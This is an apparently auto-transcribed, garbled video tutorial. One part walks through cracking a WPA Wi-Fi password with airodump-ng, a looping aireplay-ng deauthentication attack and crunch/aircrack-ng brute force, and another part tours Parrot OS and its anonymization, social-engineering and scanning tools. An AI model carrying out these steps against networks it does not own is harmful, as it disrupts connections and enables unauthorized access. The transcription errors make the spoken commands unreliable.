I'm going to pick this wi-fi

that is called attract of Wi-Fi
and it's running

on channel number 6.
So what do you want to pick

from here is the bssid
and the channel number
we need to remember
these two things first the bssid
and Channel number now.
What do you want to do after

that is open up a new window
on your terminal
and login as root.
Now what we want to do here is

run a separate Arrow dumps can
on this specific bssid

and check for all the devices
that are actually connected

to this access point.
Now we do this by running
the command airodump-ng

and while we're doing this,
we also want to capture

all the scan outputs
that we actually get

into a certain file.
So we will be actually storing

it in a file called capture
and then we just have

to pass in the bssid
and the interface We also

have to specify the channel.
So let's see what the channel is

1 so the channel is Channel 6.
So that's what we want to do
and we specify the Channel

with the - see Flags.
So after you have identified

the MAC address,
all you need to do is copy

it down and place it
with after the bssid flag.
Okay, so we're going

to run our Command out here
and we just want to say

our file is going to be
well test out capture.
Now that our scan is

up and running.
All you want to do is wait
till someone is actually

connected to this access point.
So I forgot to mention this
for this process

to actually work properly.
Somebody needs to be connected

to that access point
because what we are going to try

and do is disconnect.
That certain device

and let them reconnect
and capture that log file.
Okay, so it seems
like nobody is actually

connecting to it.
So at this time I'm going to do

is go back to our Aerodrome scan
that we had run
on a network interface and look

at some other Mac address
or other access point

to actually penetrate
into and let's see
if something has actually

connected to that.
Okay, so
oh la la now
what do you see out here is
that somebody has actually

connected to this access point
and his Mac address can be seen

under the station stab.
Now.
What we want to do is run
the authentication broadcast

message on that station
and the authenticate that guy.
No to actually run
the the authentication process.
All you have to do is go ahead
and open up a new terminal

window again and let
this can be running

in the background.
Don't use any

scanner this moment.
Okay.
So the information
that they need to

remember is the bssid
or rather the Mac ID

of the station now,
you also want your monitoring to

be running on the same channel
so that your the authentication

message is being already
broadcast on the same channel
so we can do that easily

by going airmon-ng
and saying WL One

and you can say start
on specify channel.
So what we want to be doing

is running this on Channel 6,
then we want to go and use

the third suit of tools
that is are replay now are

replay is used for broadcasting
the authentication messages
and all sorts of stuff.
Now you can see all this

in The Help menu also
and you can do

that by typing in - -
help if you go down you see
that you can send

the authentication message
using the - 0 Flag
and that's exactly

what you're going to do.
Then we stay zero again
because we wanted
constantly send a broadcast
of the authentication.
So it's looping
basically and until
and unless we stop the scan.
Nobody will actually

be able to access the Wi-Fi.
So it's basically
like a small toss attack
and then we want

to specify the bssid.
Okay, so it seems
like I forgot the whole a tag
before the bssid and

that should get it working.
Okay, so it seems
like I have copied

some wrong bssid I guess.
So, let me just go ahead

and copy that once properly.
Okay.
So now that we have

the proper bssid
as you guys can see
we are running the

authentication broadcast message
on that particular
network access card,
and now you want to run this

for around a couple of minutes
so that you become sure
that all the devices

have disconnected.
Now while this is happening
what you're doing is basically

sending a Dos attack
to that small little Wi-Fi and

you want to catch the handshake
that occurs between devices

and the router
that it is connected to
while reconnecting themselves
Okay.
So now that we've let's can run

for a couple of minutes.
Let us just stop it.
Let's stop this

others can too now.
If I go and list out

the files on my desktop,
you should see
that there's something

called the test capture.
Now, the test capsule is given

to us in various formats.
We have the capture format,

which is just capture - 0 1.
Cap and then we

have test capture CSV.
We have a Kismet CSV.

So it gives you a bunch
of formats to actually
run your cracking on now
if you remember I
had told you all
that I have already

generated a similar.
At home, basically
when I was trying to crack

into my own home password,
so I will be running
the tests on that file
or the cracking procedure

on that file.
And that is the last step

of this whole procedure.
So, let me just go ahead

and move into that folder.
So I go see these can now

as you guys can see out here
if I list down the files
if you can see a Capture

One Dot Capture One Dot CSV.
This is Kismet CSV

and this and that XML.
So I was not lying when I said
that I have already

done this at home.
So we are going to run out.
Cracking process on
capture with 0 1.
Cap now.
Let me just tell you guys

the password for my home.
Wi-Fi is sweet ship

346 so you can say
that I know the entire password,

but I'm going
to act like somebody
who only has a general idea

of what my password look like.
So let's say I know
that my password
contains tweet ship
but I don't really know the last

three numbers or letters
or whatever they may be.
Okay, so we are going

to use crunch once again
to generate a list of words
that might include Egypt

346 and let me just open
the crunch manual for once now
if you go down
in the crunch manual
what you'll see is the -
t so as you guys can see

there is a pattern
that is pit specified

like after it at the red God
and Then followed by

four other ad rates
and all the ad rates
will be replaced by
a lowercase character.
Now you can remove

other eight and use a comma
and be replaced
with an uppercase character
or you can use percentages
which in case it
would be numbers.
Or you could use the caret sign
in which case it
will insert symbol.
So when you know the length

of the password
and also a certain degree

of few letters,
you can use the hyphen T flag.
So that is exactly
what we are going to use

with crunch out here
for this example.
So, let me just remind

you guys that the password
for my home Wi-Fi

is we chipped 346.
Now what we can do

is we can ask crunch
to actually generate something

that looks like sweet ship 346.
So what I could do is say crunch

So the minimum length is 12.
I already know
that and the maximum

length is also 12 now.
Let me just input

in the pattern.
So we put in the pattern

after - tea.
So now I'm going to show you

how long it can take.
So we are just
going to say sweet
and then put in some ad rates
and then also get a try

and guess in the numbers.
So after you've put
in the pattern you want

to also input which letters
and numbers it could be
and I'm just going to input

my entire keyboard out here.
Now, what you want to do is pipe

this command through aircrack-ng
is cracking procedure.
Okay.
So now what we want to do is

type this command to aircrack-ng
and we want to write
from a rather read

from the capture file.
So what we go is -
W and then -
and then the capture file name.
So capture 0 1.
Cap and then we also

have to specify the essid
which is given to the E flag

and the essid for my home.
Wi-Fi is Nest away

underscore cc105.
So that's actly
what I'm going to type in
and this will start

the cracking process on my Wi-Fi
from the captured file.

this is going to take
a long long long long time
and I'm not really actually

going to complete it.
So in this time,
I'm actually just going to try

and explain why this is
not very feasible

on a virtual Network.
So basically this
is not feasible
because at this moment

why computer is using
all four of its course

and all the memory
that is possible.
So what this means is

on a virtual box.
This is not really possible

your virtualbox don't really
have that much power.
If you are using a 4 core

processor computer only two
of its maximum course

can be actually allotted
to your virtual box

machine above that.
You can't really give

it the entire memory
because that will make

your computer crash.
So if you want to do
something like this,
it's better that you install

Kali Linux as a dual boot or as
your own daily driver

and then you can do this.
So this is why I have not done

this on a virtual machine
and instead downest

on deep in Linux,
which is my daily
driver operating system.

this constantly trying
to actually guess the password
by actually going
through all the permutations
and combinations.
That is basically it's taking

in all the words generated
from crunch piping it

into the current command.
That is the aircrack-ng command

and is comparing everything.
So what I'm going to do is

I'm actually going to end this
because this will take

a very very very long time.
And what we're going to do is

we're going to actually try
and shorten the command

of the or the amount of guessing
that you're trying to do.
So, let me just try and do that.
So as you guys can see out here,
I have reduced
the number of alphabets
that might be actually tested.
But even in this case,
this will take

a humongous amount
of time and let me

just show that to you.

the test is running running
running and running
and and there's not really

much you can do you can just
let this run go out

for a cup of coffee
and then come back
and you might still

see that drawing.
It really depends
on what the password is
and how much time

it takes to crack it
and how much processing power

you have directly affects
how much time this will take

so let me just show you guys
that this is taking

a bunch of time.
Okay.
So now that I have

fast-forwarded a lot
into the scan you can see
that I have tried

almost two one two,
seven six zero eight keys.
So that's more
than a million Keys.
That's 2 million keys
that have tried so and it

still hasn't reached at 3:46.
So what we're going

to do is just to show you
for demonstration purposes that

this procedure actually works.
Let me just shorten

guessing even more.
So what we want to do
is this time we want
to just guess the numbers
so We'll modify
our Command accordingly.
So we just put in
sweet chip and let the algorithm

just guess at 3:46 part.
So we're going to
remove the alphabets
from the guessing scope also
and as you guys can see
the password is almost

immediately guessed
because only 456

keys were tested.
And as you guys can see it shows

that the key was found
and it's sweet ship 346 now

let me also show you
that it works with the guessing

of letters just
because I don't think of did
that letters are also guest

and not just numbers.
So let me make it just gets

the P part that is sweet.
She and then it should

guess B and then 346.
So let me just show you that and
as you guys can see it guesses

it almost immediately
after just going

through 15,000 Keys.
Okay, so that brings

us to the end
of this wi-fi cracking tutorial
and also to the end

of this video
which was regarding ethical

hacking using Kali Linux.
I hope you guys had

a bunch of fun learning
about Mac changes proxy chain.
And a bunch of stuff that we did

like Wi-Fi password cracking.
I hope you practice these
procedures and methodologies
that have thought you only for

your own educational purposes
and not use it to harm anybody

or do anything harmful with it
because let me just tell

you very seriously
that you can be prosecuted

by the law.
So let's end this video

on a good note by saying
please practice this

for only educational purposes.
Let me just show you that and
as you guys can see it guesses

it almost immediately
after just going

through 18,000 Keys.
Okay, so that brings

us to the end
of this wi-fi cracking tutorial
and also to the end

of this video
which was regarding ethical

hacking using Kali Linux.
I hope you guys had

a bunch of fun learning
about Mac changes proxy chains

and a bunch of stuff
that we did like

Wi-Fi password cracking.
I hope you practice these

procedures and methodologies
that have taught you only for

your own educational purposes
and not use it to harm anybody

or do anything harmful with it
because let me just tell you

when he sees this.
You that you can be

prosecuted by the law.
So let's end this video

on a good note by saying
please practice this

for only educational purposes.
If you are a hacker

pentester security researcher
or just another person
who picks Google in front

of friends to look cool,
then it's likely
that you must have already known

about some Linux distros,
which are particularly

made for them.
Today.
We're going to explore

one such Linux distro parrot.
Security OS one of
the leading Linux distribution

and ethical hacking.
So let's quickly go
through today's agenda first.
We will Begin by discussing
how Linux distributions are

suitable for ethical hacking
and different type

of Linux distros
that are available

for ethical hacking
and penetration testing.
Then we will begin

with our today's topic
which is parrot security OS

we will discuss
its features its history.
If or not parrot security OS

is suitable for you.
Moving on we will see
how particular day

OS is different from Kali Linux
and then I'll show you
how to install parrot security

OS using VMware software
and finally we'll end

the session by taking
a look at few popular

parrot security OS tools.
So I hope agenda
was cleared you guys.
Let's get started

then a security
focused operating system is

a hacker's best friend
as it helps a hacker
to detect the weaknesses
in computer systems
or computer networks.
whether you want to pursue

a career in information security
or you are already working

as a security professional
or if you are just interested

in this specific field
for fun or decent Linux distro,
that suits your purpose

is always a must now
if you're wondering
what a line X destroys

it is a Linux distribution
that has been curated to perform

security related tasks on most
of the time a lonex distro will
have a line X base of the Ubuntu
or Debian flavor and the usually

Some custom tools pre-installed
in it as well.
As you guys know

line X is the best choice
for Security Professionals

for obvious reasons.
And hence.
Most of the Destroyers

are usually built on it
a line X distro can help you
in performing analysis
ethical hacking then iteration

testing digital forensic task
and various other

auditing purpose,
but guys apart

from these destroys.
There are other open

source tools as well that you
can bundle and use as

per customer requirements,
but using these destroys

have lot of advantages.
Like first default,
they save a lot of time and

effort that you need to spend
when you are dealing

with customer requirements.
Secondly the help

beginners to easily start
with security testing
without having to get

into the nitty gritties
of operating system.
And lastly the most
popular reason is you have

great pool of distros
that you can choose from most
of the time Kali Linux is

the obvious first choice
of operating system
for every new hacker.
If you ask me why

the obvious answer would be
because Kali Linux is lot

of cool things it comes bundled.
With the curated collection

of tools moreover.
These tools are organized

into easy-to-navigate menu
and a Lifeboat option.
That's very new be user-friendly

as an it's very friendly
to new ethical hacker,
but guys cullinane X is

in the only distribution
which is targeted at pentesters.
There are many exciting

Alternatives that may better
fit your use case.
Anyway, let's begin

our discussion with Kali Linux.
It was developed by
a fancy security as a rewrite
of backtrack Kali Linux distro.
Those tops the list

of best operating system
for ethical hacking purposes.
And then there is

parrot security OS
which is our today's discussion.

It is a mixture
of Frozen box operating system
and Kali Linux.
It's the second most popular

operating system vertical acting
and penetration testing is well,
and then you have

back box Linux.
It's a win to based operating

system with its focus mainly
on security assessment
and penetration testing.
Then you have been

to and excellent
hacking operating system

with wide variety of tools
that you can choose from Apart
from this you have deaf clinics

blackout lining cyborg backtrack
and many others.
But as for today's session,
we will be discussing
about parrot operating system
that it OS is the second most
popular Linux distro vertical

hacking after Kali Linux.
It is a comprehensive
portable security lab
that you can use for cloud

penetration testing computer
for insects reverse engineering

hacking cryptography
and many other

security purposes.
Now a little bit about

his history the first release
of parrot OS appeared
in April 10 2013.
Originally it was developed

as part of Frozen box.
Now it has grown

to include a community
of Open Source developers
Professional Security Experts

Advocates of digital rights
and Linux enthusiasts

from all over the world.
Well compared to others

para sacar TOS promises
a lightweight operating system
and it's highly efficient along

with its plethora
of Recognize tools you also

get the opportunity to work
and surf anonymously
which is like a granted wish

to an ethical hacker
or any penetration tester

will learn about other features
in the later part

of the session.
So moving on since its release

in 2013 parrot has grown rapidly
and currently offers
many different flavors targeted

towards different use cases.
For example,
like I said,
we have para security.
It's the original parrot OS
and is designed
with penetration testing.
Forensics hacking development
and privacy in mind then

you also have parrot home
which is targeted
towards desktop users.
It strips out
the penetration testing packages
and presents are nicely

configured Debian environment.
Then you have parrot

are it's focused
on wireless penetration
testing borrowed Studio.
It's designed with

multimedia Creation in mind.
Then you have parrot

Cloud the most popular
it Target server applications

giving the user access
to full suit of penetration

testing tools included
in part security.
But it doesn't have

a graphical front end
like we do in Paris
security moving on.
We also have parrot iot.
It's designed for low

resources devices such as
orange Pi Raspberry Pi
and you have pine

64 and many others.
So it's true
that pallet security was

doesn't have large community
of users behind it
as Kali Linux dust,
but the distribution

has been gaining a lot
of momentum recent years.

So things could be
very different just a year
or two from now.
So let me convince you more.
Let's just discuss A features

of parasitic rtos.
Let's start with

the system requirement.
It's based on Debian 9.
It runs on a custom
hardened line X 4.5 kernel

uses a mate desktop
and light DM display manager.
It requires a minimum
of 256 MB RAM
and works with both 32

and 64-bit systems as well as
a are incompatible version apart
on this parrot OS can also

be installed on cloud
and updated to perform

cloud-based security.
So basically it
runs on Debian 9.
It is compatible with 32
as well as 64-bit systems
and a RM systems as well
and it requires a minimum

of 256 MB RAM.
So those are the system

requirements moving on it
also supports anonymity.
It offers a tool called and non

surf including anonymization
of entire operating system.
It comes with custom-built

anti-foreign sick tools
interfaces for gpg and crisp
that up originally it also
supports Bose encryption tools

such as Elle UK has truecrypt
and veracrypt and many others

moving on it also supports
forensic boot option

to shut put Ottomans
plus many more it braces
Falcon programming language

multiple compilers debuggers
and Beyond it also

provides full support
for developing Frameworks

for embedding systems
and many other amazing features.
So Guys, these are

few features of para todos.
So basically parrot
operating system supports
and Amity it offers different

kind of cryptography tools.
It also supports forensic mode

and it also provides opportunity
to develop Frameworks
for embedded systems
and many other amazing

features moving on
before you go ahead and use

parrot OS there are
some important considerations
that you need to take

a look at first
of all parrot towards provides

general purpose features,
like any other normal

operating system,
but guys before you go ahead
and use para Todo es there are
some important considerations
that you need to take

a look at first.
Of all it provides
general purpose features,
like any other normal

operating system does
but at its core it

is still tuned for security
and foreign six.
Now, let's see

how different parrot OS is
from other distributions.
Bharat is different from

a general-purpose distribution
because it does not try

to hide its features.
For example, there is a tool

called parrot update reminder.
It's simple yet powerful program

using this program.
You can check for system

upgrades once a week,
but instead of hiding

the upgrade process behind it.
This part like any

other operating system.
It shows the user

the full update process
from the APT output.
So you can see the upgrade

process going on.
Secondly parrot was designed
to be a very comfortable
environment for Security Experts
and researchers.
It includes many basic

programs for daily use
which other penetration

testing distributions usually
exclude part security includes

its own sandbox system.
I mean, it provides a secure

distribution user applications
and parrot are protected

to Emmett the damages in case
if the system
is compromised anytime.
So this way no harm is caused.
So like we discussed earlier

it also supports Digital
four and six digital forensics

experts need an environment
that does not

compromise their proof.
So pirate comes
with Autumn and functions
which are disabled by default
to all of four and six

Acquisitions to perform
in a very safe way.
So before you go ahead
and choose any

of these operating system,
make sure you check

out their features.
The services they offer

and make sure that
if they are suitable

for the task,
which you want to perform

but as for Peridot s
these are its features

we discussed earlier
and these are the certain points
that you should take

into consideration
before you go ahead and use it.
Now if you're wondering who
the parrot security

is made for well,
it's made for Security

Experts digital forensics
experts engineering
and IIT students researchers,
you have journalists and

activists as well in the list
and you have the new be

hackers police officers
and special security.
Institutions.
So basically if you ask me

it's suitable for a student
or the entry level

Security Experts as well.
So first, I'll show you
how to install para

sacar TOS on VMware.
So basically when it
comes to installation,
you have two options,
you can install

parrot security OS
alongside your operating system

using dual boot option
or you can install it using any

of these virtualization software
like virtual box or VMware.
Ask for today's session.

I'll show you
how to install it using VMware.
So let's get started

with our installation.
So, where is this search

for the pirate security West
and it most probably the first

link that you find on the net.
This is particle
TOS official website
as you can see,
there's a little bit

about its history.
Its features.
It says it's based on Debian.
It's designed for security

development and privacy in mind.
It also includes
a laboratory for security
and digital forensics experts

along with that it also focuses
if you want to develop

your own software
and all that and it's
project goals mostly a security

privacy and development.
This is the Which you should

consider important development
unlike other operating

systems its features.
It secure lightweight
when compared to Kali Linux

or any other operating systems
and it's a free source.
So go ahead and explore it.
So as for the download options,
you can go for

security addition here
and the download menu here you

can see other options as well.
It says home edition security
and other bills we discussed few

of the flavors of pirate.
Orsolya.
We discussed pirate home

part are part student
when you lose any weight
If you're concerned
with parrot security four point
five point one is a current

version that's running.
So you have two options

here to download.
First of all take

a look at the size.
It's 3.7 GB and 5.9 GB.
So make sure whichever

you want you downloading it
depending on your operating

system requirements.
And as you can see,

this is a lifeblood installer.
I so this is
a virtual Appliance.
You can choose any of these
if download is taking
a little longer
than you expected.
Maybe you can go

for mirrors or a torrent.
So I've already installed it.
I'm not doing it I have What is
a file as well as the Soviet

format installed as well?
Next thing we need
to do is install VMware.
So VMware VMware
Workstation Pro.
So you have
a download option here.
You can go ahead

and download it you have
for the free option yard

also have VMware Player.
I guess fate here.
I go the Ling sorry

about that here in the downloads
so you can go
for a workstation Pro
or you can also go

for workstation play
or hear any of this
with civil suits you have

he downloaded it.
It's going to take for a while.
And then all you have

to do is install click
on next and finish

the installation process.
So before you start

your virtual machine,
make sure you have

your parrot OS image ISO file
or Ruby a format
which ever is of your choice.
And then here we go

VMware Workstation homepage.
Yeah, as you can see
I already have a pirate

OS operating system installed
your or washing machine install

your this is I have install
it using ISO file.
It's very easy.
I'll show you how to do it.
But if you have ovf format,
all you have to do is click

on this file menu.
Open and as you can see,
I have a particle T over here

and click and import it.
That's all click select it

and click on open.
So I'm not going to show you

how to do that.
So it's very
straightforward process.
That's it.
This is my ISO file.
Let me show it to you again

how to install it.
Anyway current file
or you can just go for create

a new virtual machine.
Yah, click on next

and attached ISO file browse.
I have it in my
local this T here.
I have a pair of security

and open next it selinux it did.
Bian latest version

which is 64 bit and click
on next give any suitable name

for your virtual machine.
Let's say parrot

secured t Okay,
Wes and click on next.
Let's assign about

40 GB it again.
Depends on what you want to do.
If you're doing heavy tasks.
Maybe you can assign more disk.
So as it a store-bought
shall discuss a single file
or split into multiple files.
I'm going to choose single file

click on next and you
And always go ahead
and make this customize Hardware

settings earlier or later,
but you can do it now as well.
Customize Hardware.
I have not connection as
for network adapter

memory 5 to well,
let's just say 2 GB and not
yeah, we set processors.
I'm just designing one

for now cool and clues.
You can see the changes
which are made

are displayed here.
Once you're satisfied
with your settings with that

you made click on finish.
You're good to go your cigars.
System is been displaying

your so like I said,
you can always make

settings later on.
You have the set it question

machine setting options here.
Just click on this.

Let me maximize
the screen for you guys.
So as you can see the parrot

security ISO is very flexible.
There are quite a few options

you have live mode.
You have terminal mode

you have Ram mode.
So basically live mode is just

a standard live USB boot option
just like you can see
while you're installing

Kali Linux suppose.
If you don't know

how to install Kali Linux,
there's a video on how to

install it as well by durocher.
You can refer to that

in the the clacking playlist.
Okay, so coming back.
Sorry about that you

have Have a persistence
more encrypted persistence

foreign six mode
and all that terminal mode.
As you can see is

out of the live boot option.
But without graphical user

interface the most popular one
among new hackers,
or if you're the first time

user is install option
with a graphical user interface.
So it's almost familiar

with Kali Linux users.
If you want to get a feel

of parrot security
if analyst features,
maybe you can give

for live mode,
but if you want to get just
started then you can always

go for install mode.
I'm going to click on that

and click on standard install.
So it's mounting all

the installation tools
and all that.
So once the machine is booted

up you'll be asked to select
your preferred language

the broad menu select
the graphical installer options
and click on let's say English
and United States

American English.
So then the loader
will automatically install

some additional components
and configure your network

related settings.
It might take a while.
So basically then
the installer should prompt
you for a host name

and the root password.
Let's give some root

password give the password
of your choice reenter

the password for verification.
And now it's gonna ask you
to set up a user apart

from the root user.
So let's just say

test user continue.
I'm going to keep it

as tests continue
and choose a password

for the new user
which is different
from the root user password

that you'll have to remember.
What so just give this new user
a passport continue
re-enter the password?
Okay.
Let me just go back

and my mistake.
Let me try it again.
Select your time zone.
So basically after
you've set your password,
it's asking you

for the time zone.
Let's say central eastern.
So now the installer

will provide you four choices
about the partition of the disk.
The easiest option
for you is to use guided use

entire disk option
which the first option here

experienced users can always go
for manual partitioning method
for more granular

configuration options.
So yeah Gaiden partitioning
I'm going to select

that guide use entire disk.
This is the disc

we're going to store
so it's asking
if you want to store all files

in one partition or different.
Let's just say all files in one.
Mission and hit on continue.
So now we will have

to confirm all the changes
to be made to the disk

on the host machine be aware
that continuing will erase

the data on the disk.
So after that you can just click

on finish partitioning
and writing disk thing.
It's asking if you want

to write the changes
to the disk, obviously.
Yes.
So click.
Yes.
So once aren't confirming

the partition changes
the installer will run

through the process
of installing the files let it

install the system automatically
this may take a while.
So I'm we'll meet you guys

once installation is done.
So once installation
is done It'll ask you
if you want to install

the GRUB boot loader
on your hardest just say yes
and click on enter device

manually or sorry
just click the device,
which is already there go back.
The installation process

is now almost complete.
So guys the
installation is done.
Once the installation is done.
You can see the machine boots
you intimated desktop

environment as an if you
have chosen to install

option will be presented
with a light DM login screen.
So basically you'll have

to enter the password
and the which is set up

for the test use earlier.
Not the root password.
Please do remember that.
I'm sure you remember

setting up a password
for the user right

that password and login.
So here we go.
So guys here we are

as you can see
the machine boots you into

the mate desktop environment.
Let me pronounce it
M80 you can call it
whatever you want mate

or mate desktop environment.
So as you can see,
it's very good looking apart
from that parrot Security

will automatically detect
when updates are available
and prompt you to update

the system as soon as you
install it here.
It's not showing it to me

because I've already updated it,
but Otherwise, all you can do

is just go to the terminal here.
You can see terminal option

here right go to terminal there
and just say sudo apt-get update

last me for the password.
How'd it go?
Might be a matter of updated

in another virtual machine.
Anyway, I installed
the other one as well.
Maybe it's in that anyway,

I'll update for you.
So let me just minimize this

while it's updating.
Let's go ahead
and do other things.
So it's almost done I guess.
Yeah, as you can see

it's almost updated
and it says 116 packages
more can be upgraded and if I

want to have to run update list,
if you want to see

which of those packets
are have to just list out

those using app command.
Yo, I'm not showing

you two guys.
So anyway when you're making

you First make sure you system
always stays updated.
Okay, let's go back

to exploring parrot towards so
as you can see

system is laid out
in a very straightforward manner
with a collection of tools that

you might be familiar with.
If you're using Kali Linux
before the menu system is

almost similar to Kali Linux
and it's very easy to navigate

the real differences
that parrot security is meant

to be used as a daily driver as
in your regular operating system
through the other things

as well to prove
that you can see you have sound

and video options here a lot
of Grabbing languages options

as well you have system tools
and you have Graphics included

you have office applications
of software's you have base.
You have math writer
and planner just like any other

normal operating system.
So while you can use color index

as a desktop workstation,
it is really is a penetration
testing distribution first.
I'm talking about Kali Linux.
So with curly you need

to build the system
towards being a daily use system

as in you start using
Kali Linux you need to modify
or you need to customize it in.
Your way that you make

it more plausible or easy
for you to use

for the daily purposes,
but that's not the case with

parrot security OS its interface
and everything is so good.
It almost appears
like a normal operating system
and it is like a very

So you have
your penetrating distance
which are there and along

with that you have
your day-to-day applications are

also there in this now talking
about the system requirements
the default palette

Security install uses
about 300 13 MB of ram.
So as you can see here you

can see The squad little bar.
It's like a task manager,
which you can find it in

your windows can click on that.
It will show you all

the progress that's going on.
First of all,
it says the pirate gnu

Linux system in the release
and the colonel
all the information

about your ISO file
and you have made
desktop environment here
in the hardware,
which is this and the presser

it's based on available space
and all that when you

click on the processes,
it shows all the processor

which are currently
running sleeping just

like your task manager.
And your Windows

operating system.
So yeah, like I said,
it requires about 200 13 MB

of ram approximately around that
but of course,
this is only system

related process running
when compared to Kali Linux.
It's very lightweight

callanetics install requires
about 600 4 MB of RAM
and that too only with system

related process running.
So, like I said,

it's a very lightweight system.
So yeah, the bar is
a task manager it
lists all the processes
that are running and all that

you obviously have a terminal
which I showed earlier

the Cool thing with terminal is
that it goes
with their interface.
Other than that.

It's pretty much
like any other normal dominant.
And then there is a pure ends

of the interface.
I mean my first reaction

when I saw it was wow, amazing,
right when compared

to the plain Kali Linux.
So yeah, you get

to use cool collection
of wallpapers as well.
You have change

desktop background here you
have fonts interface and see

you have quite a lot
of collection of wallpapers
and you can go ahead and add

your Customs as well.
That's all about the interface.
And like I said,
it's like any other

So it comes with a lot

of programming languages
and a bunch of text editors.
You also have IDs as well.
It uses plume as
your default text editor.
So that's it
when talking about the normal

operating system not talk
about the performance

almost all of his know
that color index is a bit laggy
and when you run it

on a low-end system,
sometimes it's like a nightmare

when you have Have
Brute Force attack going on
in the background.
Are you doing something else?
It's gonna be worried say stock

or it's very slow but imperative
it's very lightweight
and doesn't like much

as you can see,
it's smooth now talk

about Hardware requirements.
Pretty much both Kali Linux
and your parrot required

high end Hardware,
but Pat, it needs

low specification Hardware
as compared to Kali.
So if I have to conclude
and one board parrot is

a good-looking distro.
It's very lightweight

its resource friendly
and Want to know
how much resources

consuming and all
that you can always go

at click on the little bar,
which is available there.
Click on the resources.
You can see the CPU is
tree memory Network history

file systems and all that.
So basically it's
a good-looking distro
lightweight resource friendly.

All this features apart tight.
Security Os Os has pretty good

collection of features as well,
which we discussed earlier.
It comes like what hell

lot of tools,
but if you see the sections,
there are a lot of other things

which are not in Kali Linux.
So the most A pointed

tool here is
that in Kali Linux is supposed

want to say private
when you're doing hacking

or any other stuff.
You have to install

a non serve tour
and then enable them

or proxy chain.
You also have the option

of proxy chains to stay yourself
Anonymous on the system

by you doing hacking
or pen testing or anything,
but with parrot OS you already

have an answer of pre-installed.
All you have to do is click

on the start button.
So let me show you

how to stay Anonymous.
So this is one
of the best feature
and Palette security OS

it has proxy change.
As well as an unsafe to make

yourself an anonymous
so you can go for this announcer
of and click on and on

Star talk before that.
You can check your IP

of your system.
So it says 1.65 1.73

doesn't just remember
it don't have to note

it down anywhere.
Well, not 651 76 now now
if I go and enable
this first of all L ask you
for the administration

passport give that Okay.
So basically once you

enter the password,
I'll ask you
if you want an answer

to kill the dangerous process
which that can be D anonymize

you are clear cache files
or modify your IP table rules

and all that.
It'll ask you
if you want to do
that just say yes.
So basically as
soon as you click on S,
as you can see the notifications

here the tool will attempt
to kill dangerous processes

that can be anonymous you
anytime it will clear

your cache files.
It will modify
your iptables modify your
Of config file disable your IPv6
and only allow you

the outbound traffic through top
as you can see it's a store

is running started for you.
Imagine doing all

this stuff by yourself.
If you don't have

an answer fly can call it an X.
This would be quite a bit

of effort manually,
but with the script

already present here,
it's just a click away.
So parrot security
also includes a seminal script
for i2p as well apart from that
once you've enabled

you can also check
like I said your IP address now.
So as you can see it says Global

Anonymous proxy activated dance,
like no one's watching encrypt

like everyone is so
basically it's saying

the surf is started out.
As you can see my IP address

has been changed it
for something of 160 something.
But right now it's 182.
So on and on surf has made

me Anonymous now,
I can do whatever you want

in an anonymous mode.
So that's all I wanted to show

you here now back to Firefox.
It has quite
a documentation part.
Well, it's still
in the creation stage here

is you can see documentation.
It's not all that well prepared
or created yet.
So if you have any minor dot

you can go ahead and refer
to the Documentation party.
Oh, so here you go.
Okay, then let's go

back to the Destro.
One thing that you can point out

about parity with is
that it has a lot

of cryptography tools such as
it has Zulu script Zulu mount

a graphical utility
that will help you mount

your encrypted volumes.
Then there is something

called Crypt Keeper.
It's another graphical utility
that allows you to manage

encrypted folders and much more.
These agilities
makes confidential.
LT easily accessible anyone

with the minimal experience.
I mean if you do not have

any idea about cryptography you
can easily start learning your

that's what I meant.
So it just doesn't stop
with cryptography or a non surf

you have lot of other tools
which you might not find

and color next.
So let me show
you guys that part
as you can see you have lot of

tools you have most used tools,
which is Armitage.
You have Wireshark Zen map

over a span all
that then you have

wireless testing tools.
Give me a second.
Yeah, post exploitation this set
of tools mostly you can't find

them in the Kali Linux.
You have OS back door

towards webpack dough tools.
You have web Covey

bleep and all that
and you have something called

social engineering kit.
If I'm right.
It should be
in the exploitation tools.
Whereas exploitation here
how you can see a social

engineering tool kit just click
on that password.
So it is started up all that.
So if I just click one,
you have a lot of options

the update set configuration you
have Social Links.
Attacks you have different type

of attacks here.
You have power

shell attack vectors.
You have mass mailer attack
you have phishing

attack vectors and all that.
So basically you can click

on that and enable all
that acts not going to show you
in this demo how to do it.
This is just the basic

introductory video
about Peridot s.
So, let me just

close the terminal
while there are common tools

like you have nmap.
I'm sure you know

how to use nmap.
Let me just show you anyway
and then map is one

of the scanning tools.
You can find it

in information guy.
Drink, I'm short and map

is you're here to one
of the basic tools.
Okay, let's just explore and map

and Demetria here.
how to use nmap first just
click and map you have

all the help or then
map configuration options

are displayed in front of you.
If you don't have to use

just go through them.
It's pretty easy

a simple example.
I'm already using the one

which is already there.
Just say scan me

dot nmap dot orgy.
Okay your aegyo making

spelling mistake again.
Sorry about that.

It's gonna take a little while.
That's all while it's scanning.
Let me just show

you another tool,
which is Dimitri.
It's a deep magic

information gathering tool.
It has ability.
So here it is.
It should be in the information
gathering only you

have your here goes.
So basically, like I said,
it has ability to gather as

much information as possible
about a hose subdomains.
It's email and

formation TCP port scan
who's look up and all that.
Let's just check out.
Then map scanning is done.
Here is the terminal.
Yeah, it's gonna take

a little while.
So once the scanning is done,
it's going to show you

how many seconds it took
what are the pores
which are open

and the close personal
that now about the material

you can enable it
from your dominant,
but you can also do it

from here information gathering
and click on the me.
Try password.
So let's say Huh?
Here we go.
So let me maximize.

you have lot of options here.
You have W,
which performs a who's look up
you can do it online as

an using Firefox as well.
You have a lot of websites
where you can gather

all the information
once you have your IP address
or and all that

and you have retrieved
and crafts outcome information

on host perform search
for possible subdomains

email address and all that.
So basically you can give

all this options in one go.
Let's say TR y - -
option taste output

your host or text or to
the file specified by -
oh, so I just press click 0,

let me just gives pseudo.
Let me just check

if I've given any file here.
I do have a file
called test dot txt.
Okay.
So like I said
in the iPhone option,
it will save your output to

the dot txt file out of the file
specified by - no option.
So basically just
specify the filename
where you want to store

the all the scan info.
Whoa, and the website

where you want to website
of whose information
you want to scan.
So let's say the blue

dot pinterest.com.
Here you go.
It started scanning.
Let me just scroll up.
The host name and the host

IP addresses showing
once you have IP addresses,
you know can gather almost

all the information.
It's also showing the places

where it's coordinated.
It's created lost modified.
You have sources you

have address here
and then yeah last modified

created sores and all that.
So basically it's showing a lot

of information here.
Similarly.
You can using Dmitry
or a deep magic information

gathering tool you can actually
gather information about any

other website you want to know.
Let's just check out
if in map is done scanning.
So see as you can see it's done.
So I've given a website name

here instead of that.
You can go ahead

and give the IP address
which is this one
and it will show you

the same results as you can see.
There are a lot of ports

